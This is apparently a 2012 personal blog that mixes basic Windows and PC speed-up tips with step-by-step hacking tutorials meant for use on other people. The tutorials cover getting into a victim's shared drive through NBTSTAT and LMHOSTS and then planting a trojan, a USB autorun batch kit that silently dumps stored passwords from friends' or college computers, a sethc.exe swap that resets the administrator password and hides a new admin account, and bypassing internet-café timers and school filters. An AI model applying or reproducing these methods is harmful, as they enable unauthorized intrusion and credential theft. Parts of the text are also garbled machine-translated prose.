Wednesday, 7 November 2012

Everyday Computer Tips

These tips work for Windows XP, Windows Vista and Windows 7.
Change the time on computer: right mouse click on the clock in the tray of the system (bottom right) or click with the right button in the system tray and choose "adjust date / time".

To save an image from a web page, right mouse click in and select "save image as". You can change it at this time too.

To see how much hard/unit hard drive disk space left, do the following: double-click my computer. right mouse click the C drive (or any hard disk drive) and choose Properties.

Most common image formats are JPG, GIF, BMP and PNG. Most common image format exported from a digital camera is a JPG.

If you accidentally delete a file, click on key Ctrl + Z again instantly. You can also search the Recycle Bin If you don't realize that until later, then, simply click with the right button on the file and choose "restore" and will return to where it came.

If holding down the SHIFT key to delete a file, it omits the Recycle Bin. Control z will still have to return.

If occasionally appears a red x instead of an image in a web page, it is not a problem with your browser settings. It is usually means the webmaster who made the page puts a link wrong.

F1 key opens Windows help quickly!

It can quickly maximize a window by double clicking in the title bar of the window… is the large blue long area in the upper part of the window. Double click again to return to the size was before to maximize.

Alphabetically order items on the start menu, click Start, click programs, and while holding the pointer over any program, right mouse click in and select to sort by name.

Quick view of the system: if holding down the Alt key while double-clicking on my PC, the System Properties window opens. This is where you can find the computer name, restore system, automatic updates, hardware and more. Will the first screen "general" show you lots of information about your system such as which version of Windows you are using, the team is registered, how fast your CPU is and how much RAM you have.

Speedup Computer Tips

My computer is running more slowly. Because mediocre results, this causes my PC work inordinately. How to speed up my computer? To avoid this nasty problems, I'm thinking some need to buy a new team instead is slow. But now it is so expensive to me. Fortunately, you can find tips, which can actually speed up my computer without having to buy a new compute

 1. Remove unnecessary temporary files can speed up your computer
These files can eat up valuable space on hard drive with the time and the slower equipment. In order to speed up your computer, you can download and install registry easy. Please click on the "Scan Now", then you can activate, can safely delete temporary files without deleting data required by the team 

2. Clean the registry that can speed up your computer
 Every time you uninstall a program, there are some remaining files on the computer, for example, your entries, configuration, configuration, etc. still were in the Windows registry. Unfortunately, computer users don't realize that the operating system Windows will read these incorrect registry entries of load of programs that do not exist in General during these wasted things overloaded at the time, the team will run more slowly. Fortunately clean registry errors through the free registration of filter or tool of record that can help delete the configuration of these unwanted elements, as well as repair the registry errors. This will help accelerate the team immediately.  

3. Defrag hard drives, can speed up the team.
To install or remove a program on the computer, this will create some incorrect files that are distributed through the hard disks into pieces. Will he time to load the data in the operating system of the computer.? Why is the computer slow.? How to speed up your computer? Defragment the disks fragment, you can speed up data access time. Just follow the step by step guide to perform this task on the computer. Click Start > all programs > Accessories > system > Disk Defragmenter tool 

4. Remove Programs unwanted in the background and run, you can speed up the team.
In order to speed up your computer, simply click on start > Control Panel > add or remove programs > discover the unnecessary programs > click Delete These processes can help to release the hard drive and improve the performance of your computer.

Sunday, 4 November 2012

How to hack someone with his IP address

Introduction. Welcome to the basic NETBIOS document created by aCId_rAIn. This document
will teach you some simple things about NETBIOS, what it does, how to use it, how to
hack with it, and some other simple DOS commands that will be useful to you in the
1. Hardware and Firmware
1a. The BIOS
The BIOS, short for Basic Input/Output Services, is the control program of the PC.
It is responsible for starting up your computer, transferring control of the system to
your operating system, and for handling other low-level functions, such as disk access.
NOTE that the BIOS is not a software program, insofar as it is not purged from
memory when you turn off the computer. It's
firmware, which is basically software on a chip.
A convenient little feature that most BIOS manufacturers include is a startup
password. This prevents access to the system until you enter the correct password.
If you can get access to the system after the password has been entered, then there
are numerous software-based BIOS password extractors available from your local
H/P/A/V site.
NETBIOS/NBTSTAT - What does it do?
also known as NBTSTAT is a program run on the Windows system and is
used for identifying a remote network or computer for file sharing enabled. We can
expoit systems using this method. It may be old but on home pc's sometimes it still
works great. You can use it on your friend at home or something. I don't care what
you do, but remember, that you are reading this document because you want to learn.
So I am going to teach you. Ok. So, you ask, "How do i get to NBTSTAT?" Well, there
are two ways, but one's faster
Method 1:Start>Programs>MSDOS PROMPT>Type NBTSTAT
Method 2:Start>Run>Type Command>Type NBTSTAT
(Note: Please, help your poor soul if that isn't like feeding you with a baby spoon.)
Ok! Now since you're in the DOS command under NBTSTAT, you're probably
wondering what all that crap is that's on your screen. These are the commands you
may use.

Your screen should look like the following:

NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP addresses to computer
NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts
RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds between each display.
Press Ctrl+C to stop redisplaying
The only two commands that are going to be used and here they are:
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.

3.Host Names.
Now, the -a means that you will type in the HOST NAME of the person's computer
that you are trying to access. Just in case you don't have any idea what a Host Name
looks like here's an example.
there are many variations of these adresses. For each different address you see
there is a new ISP assigned to that computer. look at the difference.
these are differnet host names as you can see, and, by identifying the last couple
words you will be able to tell that these are two computers on two different ISPs.
Now, here are two host names on the same ISP but a different located server.

4.IP Addresses.
You can resolce these host names if you want to the IP address (Internet Protocol)
IP addresses range in different numbers. An IP looks like this:
Most times you can tell if a computer is running on a cable connection because of the
IP address's numbers. On faster connections, usually the first two numbers are low.
here's a cable connection IP.
on dialup connections IP's are higher, like this:
notice the 208 is higher than the 24 which is the cable connection.
Some companies make IP addresses like this to fool the hacker into believing it's a
dialup, as a hacker would expect something big, like a T3 or an OC-18. Anyway Thisgives you an idea on IP addresses which you will be using on the nbtstat command.

5. Getting The IP Through DC (Direct Connection)
First. You're going to need to find his IP or host name. Either will work. If you are
on mIRC You can get it by typing /whois (nick) ...where (nick) is the persons nickname
without parenthesis. you will either get a host name or an IP. copy it down. If you do
not get it or you are not using mIRC then you must direct connect to their computer
or you may use a sniffer to figure out his IP or host name. It's actually better to do
it without the sniffer because most sniffers do not work now-a-days. So you want to
establish a direct connection to their computer. OK, what is a direct connection?
When you are:
Sending a file to their computer you are directly connected.
AOL INSTANT MESSENGER allows a Direct Connection to the user if accepted.
ICQ when sending a file or a chat request acception allows a direct connection.
Any time you are sending a file. You are directly connected. (Assuming you know the
user is not using a proxy server.)
Voice Chatting on Yahoo establishes a direct connection.
If you have none of these programs, either i suggest you get one, get a sniffer, or
read this next statement.
If you have any way of sending thema link to your site that enables site traffic
statistics, and you can log in, send a link to your site, then check the stats and get
the IP of the last visitor. It's a simple and easy method i use. It even fool some
smarter hackers, because it catches them off guard. Anyway, once you are directly
connected use either of the two methods i showed you earlier and get into DOS. Type
NETSTAT -n. NETSTAT is a program that's name is short for NET STATISTICS. It
will show you all computers connected to yours. (This is also helpful if you think you
are being hacked by a trojan horse and is on a port that you know such as Sub Seven:
27374.)Your screen should look like this showing the connections to your computer:
Active Connections
Proto Local Address Foreign Address State
The first line indicated the Protocol (language) that is being used by the two
TCP (Transfer Control Protocol) is being used in this and is most widely used.
Local address shows your IP address, or the IP address of the system you on.
Foreign address shows the address of the computer connected to yours.
State tells you what kind of connection is being made ESTABLISHED - means it will
stay connected to you as long as you are on the program or as long as the computer is
allowing or is needing the other computers connection to it. CLOSE_WAIT means the
connection closes at times and waits until it is needed or you resume connection to be
made again. One that isn't on the list is TIME_WAIT which means it is timed. Most
Ads that run on AOL are using TIME_WAIT states.
the way you know the person is directly connected to your computer is because of
Active Connections
Proto Local Address Foreign Address State
Notice the host name is included in the fourth line instead of the IP address on all.
This is almost ALWAYS, the other computer that is connected to you. So here, now,
you have the host name:
If the host name is not listed and the IP is then it NO PROBLEM because either one
works exactly the same. I am using host name as an example.
Ok so now you have the IP and/or host name of the remote system you want to
connect to. Time to hack!
Open up your DOS command. Open up NBTSTAT by typing NBTSTAT. Ok, there's
the crap again. Well, now time to try out what you have leanred from this document
by testing it on the IP and/or host name of the remote system. Here's the only thing
you'll need to know.
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
Remember this?
Time to use it.
-a will be the host name
-A will be the IP
How do i know this?
Read the Statements following the -a -A commands. It tells you there what each
command takes.
So have you found which one you have to use?
Time to start.
6. Using it to your advantage
Type this if you have the host name only.
NBTSTAT -a (In here put in hostname without parenthesis)
Type this is you have the IP address only.
NBTSTAT -A (In here put in IP address without parenthesis)
Now, hit enter and wait. Now Either one of two things came up
1. Host not found
2. Something that looks like this:
NetBIOS Local Name Table
Name Type Status
GMVPS01 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
GMVPS01 <03> UNIQUE Registered
GMVPS01 <20> UNIQUE Registered
If the computer responded "Host not found" Then either one of two things are the
1. You screwed up the host name.
2. The host is not hackable.
If number one is the case you're in great luck. If two, This system isn't hackable
using the NBTSTAT command. So try another system.
If you got the table as above to come up, look at it carefully as i describe to you each
part and its purpose.
Name - states the share name of that certain part of the computer
<00>, <03>, <20>, <1E> - Are the Hexidecimal codes giving you the services available on
that share name.
Type - Is self-explanatory. It's either turned on, or activated by you, or always on.
Status - Simply states that the share name is working and is activated.
Look above and look for the following line:
GMVPS01 <20> UNIQUE Registered
See it?
GOOD! Now this is important so listen up. The Hexidecimanl code of <20> means that
file sharing is enabled on the share name that is on that line with the hex number. So
that means GMVPS01 has file sharing enabled. So now you want to hack this. Here's
How to do it. (This is the hard part)
7. LMHOST File.
There is a file in all Windows systems called LMHOST.sam. We need to simply add
the IP into the LMHOST file because LMHOST basically acts as a network,
automatically logging you on to it. So go to Start, Find, FIles or Folders. Type in
LMHOST and hit enter. when it comes up open it using a text program such as
wordpad, but make sure you do not leave the checkmark to "always open files with
this extension" on that. Simply go through the LMHOST file until you see the part:
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
# #PRE
# #DOM:
# \0xnn (non-printing character support)
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
# Following an entry with the "#DOM:" tag will associate the
# entry with the domain specified by . This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The is always preloaded although it will not
# be shown when the name cache is viewed.
# Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)
# software to seek the specified and parse it as if it were
# local. is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# \machine\system\currentcontrolset\services\lanmans
# in the registry. Simply add "public" to the list found there.
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
Read this over and over until you understand the way you want your connection to be
set. Here's an example of how to add an IP the way I would do it:
Pre will preload the connection as soon as you log on to the net. DOM is the domain or
IP address of the host you are connecting to. INCLUDE will automaticall set you to
that file path. In this case as soon as I log on to the net I will get access to on the C:/ drive. The only problem with this is that by doin the
NETSTAT command while you are connected, and get the IP of your machine. That's
why it only works on simple PC machines. Because people in these days are computer
illiterate and have no idea of what these commands can do. They have no idea what
NETSTAT is, so you can use that to your advantage. Most PC systems are kind of
hard to hack using this method now because they are more secure and can tell when
another system is trying to gain access. Also, besure that you (somehow) know
whether they are running a firewall or not because it will block the connection to
their computer. Most home systems aren't running a firewall, and to make it better,
they don't know how operate the firewall, therefore, leaving the hole in the system.
To help you out some, it would be a great idea to pick up on some programming
languages to show you how the computer reads information and learn some things on
TCP/IP (Transfer Control Protocol/Internet Protocol) If you want to find out
whether they are running a firewall, simply hop on a Proxy and do a port scan on their
IP. You will notice if they are running a firewall because most ports are closed. Either
way, you still have a better chance of hacking a home system than hacking Microsoft.
8.Gaining Access
Once you have added this to you LMHOST file. You are basically done. All you need
to do is go to:
Once you get there you simply type the IP address or the host name of the system.
When it comes up, simply double click it, and boom! There's a GUI for you so you
don't have to use DOS anymore. You can use DOS to do it, but it's more simple and
fun this way, so that's the only way i put it. When you open the system you can edit,
delete, rename, do anything to any file you wish. I would also delete the command file
in C:/ because they may use it if they think someone is in their computer. Or simply
delete the shortcut to it. Then here's when the programming comes in handy. Instead
of using the NBTSTAT method all the time, you can then program you own trojan on
your OWN port number and upload it to the system. Then you will have easier access
and you will also have a better GUI, with more features. DO NOT allow more than one
connection to the system unless they are on a faster connection. If you are
downloading something from their computer and they don't know it and their
connection is being slow, they may check their NETSTAT to see what is connected,
which will show your IP and make them suspicious. Thats it. All there is to it. Now go
out and scan a network or something and find a computer with port 21 or something

How to Hack passwords using USB Drive

Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily
basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows
messenger etc.
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places.
Using these tools and an USB pendrive you can create your own rootkit to hack
passwords from your friend’s/college Computer.
We need the following tools to create our rootkit:
MessenPass: Recovers the passwords of most popular Instant Messenger programs:
MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook
Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by
Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as
older versions of Internet explorer, v4.0 - v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected
Storage, including the AutoComplete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view
the user names and passwords stored by Mozilla Firefox Web browser. By default,
PasswordFox displays the passwords stored in your current profile, but you can easily
select to watch the passwords of any other Firefox profile. For each password entry,
the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons filename.
------------------------------------- ------------------------------------------------------
Here is a step by step procedre to create the password hacking toolkit:
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files)
into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
into your USB Drive.
2. Create a new Notepad and write the following text into it:
ACTION= Perform a Virus Scan

save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this
pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have
created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background
(This process takes hardly a few seconds). The passwords get stored in the .TXT

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the

How To Hack An Administrator Account With A Guest Account

 The only way this is going to work is if your account has permission to mody files in folder
Ever wanted to hack your college pc with guest account/student account so that you
can download with full speed Hack Administrator !!!!there ? or just wanted to hack
your friend’s pc to make him gawk when you tell your success story of hacking ?
well,there is a great way of hacking an administrator account from a guest account by
which you can reset the administrator password and getting all the privilages an
administrator enjoys on windows.. Interested ? read on…

Press shift key 5 times and the sticky key dialog shows up.This works even at the
logon screen. But If we replace the sethc.exe which is responsible for the sticky key
dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon
screen,we will get a command prompt with administrator privilages because no user
has logged on. From there we can hack the administrator password,even from a guest

Guest account with write access to system 32.
Here is how to do that -

* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the
file,then click yes.
When asked to overwrite, overwrite the sethc.exe.
* Now Log out from your guest account and at the user select window,press shift key
5 times.
* Instead of Sticky Key confirmation dialog,command prompt with full administrator
privileges will open.

Press shift key 5 times and command prompt will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password
you like and press enter.
* You will see “ The Command completed successfully” and then exit the command
prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account.

Also, you can further create a new user at the command prompt by typing “NET USER
Ephemeral /ADD” where “Ephemeral” is the username you would like to add with
administrator privileges. Then hide your newly created admin account by -
Go to registry editor and navigate to this key
Here create a new DWORD value, write its name as the “user name” that u created
for your admin account and live with your admin account forever :)

Thursday, 1 November 2012

How to get unlimited time in Internet Café's

Today we're going to learn how to disable the timer on the computers in Internet
Let's go through the steps, shall we?

1. Create a New Text Document.

2. Then type CMD in it.

3. And then save it as anything.bat
(Make sure the file do NOT end on .txt, but on .bat)

4. Go to the location were you saved the .bat file and run it. If you've done this
correctly, you'll see that Command Prompt is open.

5. Now that Command Prompt is open, type in: cd\windows
(This will change the directory to Windows)

6. Then type in: regedit
(This will get you to the registry editor gui)

7. Now navigate to:
version>internet settings>policies>system

8. Then on the right pane where it says Disable Taskmanager, right click on it, and
scroll down to modify, and than change the value of it to "0".

9. And then open Windows Task Manager

10. And then disable the Internet Cafe's timer.
If you did this right, then you're done! Well done :D

How to get past your school blocking system without programs

Right, first off, you need to go onto:
This is a virtual machine/ computer that your sysadmins shouldn't have blocked. At
my school, our security is pretty high because of people like me and you. After you
are on the website, it should look like this:

 Ok, now you click on the big button that says: Start. Then, after that, you should see
another screen that looks like this:

Now make an account, you should see the register button. I have made an account,
(trust me, it is easy). After you have logged in, you should see another screen that
looks something like this:

After you have got logged in, you should try and get on the internet (alpha), to
get on the internet, follow these commands.
on the desktop, click on the icon that says: find cool web stuff.
Then click the icon that says: Web.
Now go to: Ghost services.
And there should be a icon that says: browser (alpha).
(If you go on a website, and it says: open in a new tab because this site will function
better, (or something like that) don't do it. But if you want to, just do it).